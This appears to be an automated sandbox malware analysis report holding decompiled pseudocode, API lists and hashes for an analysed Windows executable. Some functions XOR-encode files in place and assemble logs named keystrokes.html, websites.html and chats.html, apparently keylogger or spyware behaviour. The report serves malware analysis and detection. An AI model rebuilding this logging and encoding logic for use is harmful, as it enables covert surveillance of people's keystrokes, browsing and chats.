							L0043E47A();
							L0043E474();
							_push(_t112 + 0x10);
							L0043E276();
							 *(_t112 - 4) = 7;
							E0042AAFA( *(_t112 + 0x10));
							 *(_t112 - 4) = 5;
							L0043DD36();
							 *(_t112 - 0x28) = 0x445490;
							 *(_t112 - 4) = 8;
							_t110 = 1;
						} else {
							 *(_t112 - 0x28) = 0x445490;
							 *(_t112 - 4) = 6;
							_t110 = 0;
						}
						L0043DD36();
						 *(_t112 - 0x28) = 0x44547c;
						 *(_t112 - 4) = 1;
						L0043E46E();
						 *(_t112 - 4) = 0;
						L0043DD36();
					} else {
						 *((intOrPtr*)(_t85 + 8))();
						_t76 =  *0x455b50; // 0x0
						 *((intOrPtr*)( *_t76 + 8))(_t76);
						__imp__CoUninitialize();
						_t110 = 0;
					}
					_t56 = _t112 - 4;
					 *_t56 =  *(_t112 - 4) | 0xffffffff;
					__eflags =  *_t56;
					L0043DD36();
					_t74 = _t110;
				} else {
					__imp__CoUninitialize();
					_t74 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t112 - 0xc));
				return _t74;
			}

0x0042a486
0x0042a48b
0x0042a497
0x0042a4a4
0x0042a4b3
0x0042a4b6
0x0042a4bb
0x0042a4be
0x0042a4c1
0x0042a4d1
0x0042a4d5
0x0042a4e5
0x0042a4e9
0x0042a4fb
0x0042a4eb
0x0042a4ee
0x0042a4ef
0x0042a4f2
0x00000000
0x0042a4f2
0x0042a4d7
0x0042a4da
0x0042a4db
0x0042a4de
0x00000000
0x0042a4de
0x0042a4c3
0x0042a4c6
0x0042a4c7
0x0042a4ca
0x0042a4f7
0x0042a4f8
0x0042a4fe
0x0042a500
0x0042a506
0x0042a507
0x0042a509
0x0042a526
0x0042a529
0x0042a531
0x0042a534
0x0042a545
0x0042a54b
0x0042a551
0x0042a559
0x0042a561
0x0042a565
0x0042a56a
0x0042a570
0x0042a571
0x0042a579
0x0042a581
0x0042a585
0x0042a58d
0x0042a591
0x0042a596
0x0042a59f
0x0042a5a3
0x0042a5a7
0x0042a5aa
0x0042a5ad
0x0042a5b2
0x0042a5b8
0x0042a5b9
0x0042a5be
0x0042a5c1
0x0042a5c5
0x0042a5ca
0x0042a5cc
0x0042a5d9
0x0042a5df
0x0042a5e2
0x0042a5e3
0x0042a5eb
0x0042a5f6
0x0042a5f7
0x0042a5fe
0x0042a602
0x0042a608
0x0042a60f
0x0042a614
0x0042a619
0x0042a61d
0x0042a5ce
0x0042a5ce
0x0042a5d1
0x0042a5d5
0x0042a5d5
0x0042a621
0x0042a629
0x0042a630
0x0042a634
0x0042a63c
0x0042a63f
0x0042a50b
0x0042a50b
0x0042a50e
0x0042a516
0x0042a519
0x0042a51f
0x0042a51f
0x0042a644
0x0042a644
0x0042a644
0x0042a64b
0x0042a650
0x0042a4a6
0x0042a4a6
0x0042a4ac
0x0042a4ac
0x0042a657
0x0042a65f

APIs

__EH_prolog.LIBCMT ref: 0042A48B
CoInitialize.OLE32(00000000), ref: 0042A497

Part of subcall function 00429112: CoCreateInstance.OLE32(0044A5A4,00000000,00000001,0044A5C4,?,?,00000001), ref: 00429132

CoUninitialize.OLE32(?,?,00000000), ref: 0042A4A6
#540.MFC42(?,?,00000000), ref: 0042A4B6
CoUninitialize.OLE32(?,?,00000000), ref: 0042A519
#800.MFC42(00000002,?,?,?,00001001,?,00000000,00000000,00000002,</BODY>), ref: 0042A64B

Strings

</BODY>, xrefs: 0042A559
|TD, xrefs: 0042A629
HTML_TEMPLATE, xrefs: 0042A53F

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Uninitialize$#540#800CreateH_prologInitializeInstance
String ID: </BODY>$HTML_TEMPLATE$|TD
API String ID: 2735192737-441621316
Opcode ID: 574f6f869dd8bebed04467da3fc4568b328b03bd08de2e55b330a5822f44e0c5
Instruction ID: f31b22002c98a46963b574554f801982d2b542f9e7fe878eea16abfbd2e59b8e
Opcode Fuzzy Hash: 574f6f869dd8bebed04467da3fc4568b328b03bd08de2e55b330a5822f44e0c5
Instruction Fuzzy Hash: F951C330D00259EFCF04EFA5D945AEEBB74BF18308F50405EF416A3192DB789A45CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A7B1, Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042A7B1() {
				void* _t40;
				void* _t42;
				CHAR* _t48;
				void* _t69;
				void* _t74;
				int _t77;
				void* _t80;

				_t40 = E0043E4E0(0x443208, _t80);
				L0043DDE4();
				_t77 = 0;
				 *(_t80 - 4) = 0;
				L0043DDE4();
				_t48 =  *(_t80 + 8);
				_push(0);
				_push(0x8000);
				_push(_t48);
				 *(_t80 - 4) = 1;
				L0043DDCC();
				if(_t40 != 0) {
					L0043E2A6();
					if(_t40 != 0) {
						_push(_t48);
						L0043DE26();
						_push(".tmp");
						_push(_t40);
						_t42 = _t80 - 0x10;
						 *(_t80 - 4) = 2;
						_push(_t42);
						L0043DE20();
						 *(_t80 - 4) = 4;
						L0043DD36();
						_push(0);
						_push(0xb021);
						_push( *(_t80 - 0x10));
						L0043DDCC();
						if(_t42 != 0) {
							_push(0x800);
							L0043DD54();
							_t74 = _t42;
							while(1) {
								_push(0x800);
								_push(_t74);
								L0043E29A();
								if(_t42 == 0) {
									break;
								}
								_t69 = 0;
								if(_t42 > 0) {
									do {
										 *(_t69 + _t74) =  *(_t69 + _t74) ^  *(_t80 + 0xc);
										_t69 = _t69 + 1;
									} while (_t69 < _t42);
								}
								_push(_t42);
								_push(_t74);
								L0043E28E();
							}
							L0043E27C();
							L0043E27C();
							_push(_t80 + 0xc);
							L0043E276();
							 *(_t80 - 4) = 5;
							E0042AAFA( *(_t80 + 0xc));
							 *(_t80 - 4) = 4;
							L0043DD36();
							_push(_t74);
							L0043DD42();
							DeleteFileA(_t48);
							_t77 = MoveFileA( *(_t80 - 0x10), _t48);
							 *(_t80 - 4) = 1;
							L0043DD36();
						} else {
							 *(_t80 - 4) = 1;
							L0043DD36();
						}
					}
				}
				 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
				L0043DDC0();
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				L0043DDC0();
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t77;
			}

0x0042a7b6
0x0042a7c3
0x0042a7c8
0x0042a7cd
0x0042a7d0
0x0042a7d5
0x0042a7d8
0x0042a7d9
0x0042a7de
0x0042a7e2
0x0042a7e6
0x0042a7ed
0x0042a7f6
0x0042a7fd
0x0042a803
0x0042a807
0x0042a80c
0x0042a811
0x0042a812
0x0042a815
0x0042a819
0x0042a81a
0x0042a822
0x0042a826
0x0042a82b
0x0042a82c
0x0042a831
0x0042a837
0x0042a83e
0x0042a857
0x0042a858
0x0042a85e
0x0042a860
0x0042a860
0x0042a861
0x0042a865
0x0042a86c
0x00000000
0x00000000
0x0042a86e
0x0042a872
0x0042a874
0x0042a877
0x0042a87a
0x0042a87b
0x0042a874
0x0042a87f
0x0042a880
0x0042a884
0x0042a884
0x0042a88e
0x0042a896
0x0042a8a1
0x0042a8a2
0x0042a8a9
0x0042a8ad
0x0042a8b3
0x0042a8ba
0x0042a8bf
0x0042a8c0
0x0042a8c7
0x0042a8da
0x0042a8dc
0x0042a8e0
0x0042a840
0x0042a843
0x0042a847
0x0042a847
0x0042a83e
0x0042a7fd
0x0042a8e6
0x0042a8ed
0x0042a8f2
0x0042a8f9
0x0042a905
0x0042a90d

APIs

__EH_prolog.LIBCMT ref: 0042A7B6
#354.MFC42 ref: 0042A7C3
#354.MFC42 ref: 0042A7D0
#5186.MFC42(?,00008000,00000000), ref: 0042A7E6
#3318.MFC42(?,00008000,00000000), ref: 0042A7F6
#537.MFC42(?,?,00008000,00000000), ref: 0042A807
#924.MFC42(?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A81A
#800.MFC42(?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A826
#5186.MFC42(?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A837
#800.MFC42(?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A847
#823.MFC42(00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A858
#5442.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A865
#6385.MFC42(00000000,00000000,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A884
#1979.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A88E
#1979.MFC42(00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A896
#3180.MFC42(?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8A2
#800.MFC42(?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8BA
#825.MFC42(00000000,?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8C0
DeleteFileA.KERNEL32(?,?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8C7
MoveFileA.KERNEL32 ref: 0042A8D1
#800.MFC42(?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8E0
#665.MFC42(?,00008000,00000000), ref: 0042A8ED
#665.MFC42(?,00008000,00000000), ref: 0042A8F9

Strings

.tmp, xrefs: 0042A80C

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#1979#354#5186#665File$#3180#3318#537#5442#6385#823#825#924DeleteH_prologMove
String ID: .tmp
API String ID: 305873378-2986845003
Opcode ID: 87ba66c8bba4c17929835ed87ef95f6cae4899f468e9b137d3c1cf1e9a6ea6c3
Instruction ID: bfe8f811415cd10edc97a19dd742a66821ef03b2ee5b5deb08405478e6b60b2e
Opcode Fuzzy Hash: 87ba66c8bba4c17929835ed87ef95f6cae4899f468e9b137d3c1cf1e9a6ea6c3
Instruction Fuzzy Hash: 7041B431D00169AADF14FBB6EC55AEE7B78AF19348F10406EF802A3192DF3C4A05C769

Uniqueness

Uniqueness Score: -1.00%

Function 0041928F, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 197
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041928F(intOrPtr __ecx) {
				int _t71;
				char _t72;
				void* _t79;
				struct HMENU__* _t80;
				struct HMENU__* _t81;
				int* _t82;
				long _t85;
				intOrPtr* _t88;
				int _t98;
				signed int _t102;
				int _t117;
				intOrPtr* _t134;
				struct HMENU__* _t139;
				int* _t140;
				intOrPtr _t141;
				void* _t142;

				_t71 = E0043E4E0(0x44109c, _t142);
				_push(0x4e25);
				 *((intOrPtr*)(_t142 - 0x24)) = __ecx;
				 *(_t142 - 0x20) = 0;
				L0043DFA6();
				if(_t71 != 0) {
					_t72 =  *0x4550cc; // 0x0
					 *(_t142 - 0xbc) = _t72;
					_t102 = 0x1f;
					 *(_t142 - 0x28) = 0x80;
					memset(_t142 - 0xbb, 0, _t102 << 2);
					asm("stosw");
					asm("stosb");
					GetUserNameA(_t142 - 0xbc, _t142 - 0x28);
					if( *(_t142 - 0xbc) == 0) {
						lstrcpyA(_t142 - 0xbc,  *(E00429029(_t142 - 0x18, 0xe072)));
						L0043DD36();
					}
					_t79 = E00429029(_t142 - 0x18, 0xe073);
					 *(_t142 - 4) = 0;
					_push(_t142 - 0xbc);
					_push(_t79);
					_t80 = _t142 - 0x1c;
					_push(_t80);
					L0043DE20();
					 *(_t142 - 4) = 2;
					L0043DD36();
					_push(0x50);
					L0043DD54();
					 *(_t142 - 0x14) = _t80;
					 *(_t142 - 4) = 3;
					if(_t80 == 0) {
						_t134 = 0;
					} else {
						_t134 = L00407A6F(_t80, _t80);
					}
					 *(_t142 - 4) = 2;
					 *((intOrPtr*)(_t134 + 0x4c)) = 2;
					_t81 = CreatePopupMenu();
					_push(_t81);
					L0043E2D6();
					_push(0x1c);
					 *((intOrPtr*)(_t134 + 0x10)) = 0xefefef;
					 *((intOrPtr*)(_t134 + 0x14)) = 0xffffff;
					 *((intOrPtr*)(_t134 + 0x18)) = 0;
					 *((intOrPtr*)(_t134 + 0x1c)) = 0x5a5a5a;
					L0043DD54();
					_t139 = _t81;
					 *(_t142 - 0x14) = _t139;
					 *(_t142 - 4) = 4;
					if(_t139 == 0) {
						_t139 = 0;
					} else {
						_t29 = _t142 - 0x1c; // 0x5a5a5a
						 *((intOrPtr*)(_t142 - 0x10)) =  *_t29;
						_t81 = L00408EBB( *_t29, _t139);
						_t31 = _t142 - 0x10; // 0xefefef
						_push( *_t31);
						 *(_t142 - 4) = 5;
						_t139->i = 0x447aa8;
						 *(_t139 + 8) = 1;
						L0043DDD2();
						 *(_t139 + 0x14) =  *(_t139 + 0x14) & 0x00000000;
					}
					_push(0);
					_push(_t139);
					 *(_t142 - 4) = 2;
					_t82 = L00408DA4(_t81, _t134, 0);
					_push(0x1c);
					L0043DD54();
					_t140 = _t82;
					 *(_t142 - 0x2c) = _t140;
					 *(_t142 - 4) = 6;
					if(_t140 == 0) {
						_t140 = 0;
						_t98 = 2;
					} else {
						 *(_t142 - 0x20) = 1;
						_t88 = E00429029(_t142 - 0x14, 0xe074);
						 *(_t142 - 4) = 7;
						 *((intOrPtr*)(_t142 - 0x10)) =  *_t88;
						_t82 = L00408EBB( *_t88, _t140);
						 *_t140 = 0x447aa8;
						_t98 = 2;
						_t45 = _t142 - 0x10; // 0xefefef
						_push( *_t45);
						 *(_t142 - 4) = 8;
						_t140[2] = _t98;
						L0043DDD2();
						_t140[5] = _t140[5] & 0x00000000;
					}
					_push(0);
					_push(_t140);
					 *(_t142 - 4) = 9;
					L00408DA4(_t82, _t134, 0);
					 *(_t142 - 4) = _t98;
					if(( *(_t142 - 0x20) & 0x00000001) != 0) {
						L0043DD36();
					}
					_t141 =  *((intOrPtr*)(_t142 - 0x24));
					_t85 = CheckMenuItem( *(_t134 + 4),  *(_t141 + 0x1c0), 8);
					_push(0x4e25);
					L0043E066();
					_t71 = GetWindowRect( *(_t85 + 0x20), _t142 - 0x3c);
					_push(0);
					_push(_t141);
					_push( *((intOrPtr*)(_t142 - 0x30)));
					_push( *(_t142 - 0x3c));
					_push(0x102);
					L0043E2D0();
					_t117 = 1;
					if(_t71 != _t117) {
						if(_t71 == _t98) {
							 *(_t141 + 0x1c0) = _t98;
						}
					} else {
						 *(_t141 + 0x1c0) = _t117;
					}
					if(_t134 != 0) {
						_t71 =  *((intOrPtr*)( *_t134 + 4))(_t117);
					}
					 *(_t142 - 4) =  *(_t142 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t142 - 0xc));
				return _t71;
			}

0x00419294
0x004192a2
0x004192a7
0x004192aa
0x004192ad
0x004192b4
0x004192ba
0x004192c2
0x004192c8
0x004192d1
0x004192d8
0x004192da
0x004192dc
0x004192e8
0x004192f5
0x00419310
0x00419319
0x00419319
0x00419327
0x00419334
0x00419337
0x00419338
0x00419339
0x0041933c
0x0041933d
0x00419345
0x00419349
0x0041934e
0x00419350
0x00419356
0x0041935b
0x0041935f
0x0041936c
0x00419361
0x00419368
0x00419368
0x0041936f
0x00419373
0x0041937a
0x00419380
0x00419383
0x00419388
0x0041938a
0x00419391
0x00419398
0x0041939b
0x004193a2
0x004193a7
0x004193aa
0x004193af
0x004193b8
0x004193e5
0x004193ba
0x004193ba
0x004193bf
0x004193c2
0x004193c7
0x004193c7
0x004193cd
0x004193d1
0x004193d3
0x004193da
0x004193df
0x004193df
0x004193e7
0x004193e9
0x004193ee
0x004193f2
0x004193f7
0x004193f9
0x004193fe
0x00419401
0x00419406
0x0041940a
0x00419455
0x00419457
0x0041940c
0x00419415
0x0041941c
0x00419427
0x0041942b
0x0041942e
0x00419435
0x00419437
0x0041943b
0x0041943b
0x0041943e
0x00419445
0x00419448
0x0041944d
0x0041944d
0x00419458
0x0041945a
0x0041945f
0x00419466
0x0041946f
0x00419472
0x00419477
0x00419477
0x0041947c
0x0041948b
0x00419491
0x00419498
0x004194a4
0x004194aa
0x004194ac
0x004194ad
0x004194b2
0x004194b5
0x004194ba
0x004194c1
0x004194c4
0x004194d0
0x004194d2
0x004194d2
0x004194c6
0x004194c6
0x004194c6
0x004194db
0x004194e2
0x004194e2
0x004194e5
0x004194ec
0x004194f1
0x004194f6
0x004194fe

APIs

__EH_prolog.LIBCMT ref: 00419294
#4055.MFC42(00004E25), ref: 004192AD
GetUserNameA.ADVAPI32(?,00000080), ref: 004192E8
lstrcpyA.KERNEL32(00000000,00000000), ref: 00419310
#800.MFC42 ref: 00419319
#924.MFC42(?,00000000,00000000), ref: 0041933D
#800.MFC42(?,00000000,00000000), ref: 00419349
#823.MFC42(00000050,?,00000000,00000000), ref: 00419350
CreatePopupMenu.USER32(?,?,00000000,00000000), ref: 0041937A
#1644.MFC42(00000000,?,?,00000000,00000000), ref: 00419383
#823.MFC42(0000001C,00000000,?,?,00000000,00000000), ref: 004193A2
#860.MFC42(,?,?,00000000,00000000), ref: 004193DA
#823.MFC42(0000001C,?,?,00000000,00000000), ref: 004193F9
#860.MFC42(,?,?,00000000,00000000), ref: 00419448

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#800.MFC42(?,?,00000000,00000000), ref: 00419477
CheckMenuItem.USER32(?,?,00000008), ref: 0041948B
#3092.MFC42(00004E25,?,?,00000000,00000000), ref: 00419498
GetWindowRect.USER32 ref: 004194A4
#6270.MFC42(00000102,?,?,?,00000000,?,?,00000000,00000000), ref: 004194BA
#800.MFC42(?,?,?,00000000,?,?,00000000,00000000), ref: 004194EC

Strings

, xrefs: 0041943B, 004193C7
ZZZ, xrefs: 004194E9, 004193BA
ZZZ, xrefs: 0041939B

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#823$#860Menu$#1168#1644#3092#4055#537#6270#924CheckCreateH_prologItemLoadNamePopupRectStringUserWindowlstrcpy
String ID: ZZZ$ZZZ$
API String ID: 1344333890-3423331757
Opcode ID: 4288fd3069aa800c77226ea70a20bfa23afa6eefb7a52f55914676f7e271052f
Instruction ID: 0a9211ace98afe87d242dc7c9eb282712b41aaf0f36b400b24ae6c5c17b1cf5b
Opcode Fuzzy Hash: 4288fd3069aa800c77226ea70a20bfa23afa6eefb7a52f55914676f7e271052f
Instruction Fuzzy Hash: 6E71DF71D04259EEEB24DFA5D84ABEEBBB5BF08304F10055EE101A72C1DBB85A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00427C70, Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00427C70(void* __ecx, void* __edx) {
				void* _t60;
				void* _t78;
				intOrPtr _t83;
				void* _t85;
				void* _t87;
				void* _t88;

				_t76 = __edx;
				E0043E4E0(0x442e50, _t85);
				_t88 = _t87 - 0x1c;
				_push("bpk.dat");
				_push(0x4558c4);
				_t78 = __ecx;
				_push(_t85 - 0x28);
				 *((intOrPtr*)(_t85 - 0x10)) = 0;
				L0043DE20();
				_push("web.dat");
				_push(0x4558c4);
				_push(_t85 - 0x24);
				 *(_t85 - 4) = 0;
				L0043DE20();
				_push("bpkch.dat");
				_push(0x4558c4);
				_push(_t85 - 0x20);
				 *(_t85 - 4) = 1;
				L0043DE20();
				_push("keystrokes.html");
				_push(0x4558c8);
				_push(_t85 - 0x1c);
				 *(_t85 - 4) = 2;
				L0043DE20();
				_push("websites.html");
				_push(0x4558c8);
				_push(_t85 - 0x18);
				 *(_t85 - 4) = 3;
				L0043DE20();
				_push("chats.html");
				_push(0x4558c8);
				_push(_t85 - 0x14);
				 *(_t85 - 4) = 4;
				L0043DE20();
				 *(_t85 - 4) = 5;
				if( *((intOrPtr*)(__ecx + 0x17f8)) == 0) {
					L3:
					_t83 = 1;
					L4:
					if( *((intOrPtr*)(_t78 + 0x17f8)) != 0) {
						_push(_t83);
						_push( *((intOrPtr*)(_t85 - 0x18)));
						_push( *((intOrPtr*)(_t85 - 0x24)));
						if(E0042A486(_t76) != 0) {
							_push(_t85 - 0x18);
							L0043DFCA();
							 *((intOrPtr*)(_t85 - 0x10)) = _t83;
						}
						if( *((intOrPtr*)(_t78 + 0x17f8)) != 0) {
							_push(2);
							_push( *((intOrPtr*)(_t85 - 0x14)));
							_push( *((intOrPtr*)(_t85 - 0x20)));
							if(E0042A486(_t76) != 0) {
								_push(_t85 - 0x14);
								L0043DFCA();
								 *((intOrPtr*)(_t85 - 0x10)) = _t83;
							}
						}
					}
					 *(_t85 - 4) = 4;
					L0043DD36();
					 *(_t85 - 4) = 3;
					L0043DD36();
					 *(_t85 - 4) = 2;
					L0043DD36();
					 *(_t85 - 4) = 1;
					L0043DD36();
					 *(_t85 - 4) = 0;
					L0043DD36();
					 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
					L0043DD36();
					 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
					return  *((intOrPtr*)(_t85 - 0x10));
				}
				_push(0);
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_push( *((intOrPtr*)(_t85 - 0x28)));
				_t60 = E0042A486(__edx);
				_t88 = _t88 + 0xc;
				if(_t60 == 0) {
					goto L3;
				} else {
					_push(_t85 - 0x1c);
					L0043DFCA();
					_t83 = 1;
					 *((intOrPtr*)(_t85 - 0x10)) = 0x4558c8;
					goto L4;
				}
			}

0x00427c70
0x00427c75
0x00427c7a
0x00427c85
0x00427c8f
0x00427c90
0x00427c92
0x00427c93
0x00427c96
0x00427c9b
0x00427ca3
0x00427ca4
0x00427ca5
0x00427ca8
0x00427cad
0x00427cb5
0x00427cb6
0x00427cb7
0x00427cbb
0x00427cc5
0x00427ccd
0x00427cce
0x00427ccf
0x00427cd3
0x00427cd8
0x00427ce0
0x00427ce1
0x00427ce2
0x00427ce6
0x00427ceb
0x00427cf3
0x00427cf4
0x00427cf5
0x00427cf9
0x00427d04
0x00427d08
0x00427d31
0x00427d33
0x00427d34
0x00427d3a
0x00427d3c
0x00427d3d
0x00427d40
0x00427d4d
0x00427d55
0x00427d56
0x00427d5b
0x00427d5b
0x00427d64
0x00427d66
0x00427d68
0x00427d6b
0x00427d78
0x00427d80
0x00427d81
0x00427d86
0x00427d86
0x00427d78
0x00427d64
0x00427d8c
0x00427d90
0x00427d98
0x00427d9c
0x00427da4
0x00427da8
0x00427db0
0x00427db4
0x00427dbc
0x00427dbf
0x00427dc4
0x00427dcb
0x00427dd9
0x00427de1
0x00427de1
0x00427d0a
0x00427d0b
0x00427d0e
0x00427d11
0x00427d16
0x00427d1b
0x00000000
0x00427d1d
0x00427d23
0x00427d24
0x00427d2b
0x00427d2c
0x00000000
0x00427d2c

APIs

__EH_prolog.LIBCMT ref: 00427C75
#924.MFC42(?,004558C4,bpk.dat,?,?,00000000), ref: 00427C96
#924.MFC42(?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CA8
#924.MFC42(?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CBB
#924.MFC42(?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CD3
#924.MFC42(?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat), ref: 00427CE6
#924.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427CF9
#858.MFC42(?,?,?,00000000), ref: 00427D24
#858.MFC42(?,?,?,00000000), ref: 00427D56
#858.MFC42(?,?,?,?,?,?,00000000), ref: 00427D81
#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427D90
#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427D9C
#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DA8
#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DB4
